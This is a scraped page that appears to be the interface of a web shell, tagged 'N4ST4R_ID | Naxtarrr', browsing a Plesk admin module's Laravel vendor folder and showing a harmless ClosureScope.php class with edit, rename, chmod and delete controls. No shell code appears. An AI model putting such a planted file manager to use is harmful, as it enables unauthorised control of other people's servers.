Submit
Path:
~
/
/
usr
/
local
/
psa
/
admin
/
plib
/
modules
/
log-browser
/
vendor
/
laravel
/
serializable-closure
/
src
/
Support
/
File Content:
ClosureScope.php
<?php namespace PleskLogBrowser\Laravel\SerializableClosure\Support; use SplObjectStorage; class ClosureScope extends SplObjectStorage { /** * The number of serializations in current scope. * * @var int */ public $serializations = 0; /** * The number of closures that have to be serialized. * * @var int */ public $toSerialize = 0; }
Edit
Rename
Chmod
Delete
FILE
FOLDER
INFO
Name
Size
Permission
Action
ClosureScope.php
392 bytes
0644
ClosureStream.php
3632 bytes
0644
ReflectionClosure.php
46452 bytes
0644
SelfReference.php
401 bytes
0644
N4ST4R_ID | Naxtarrr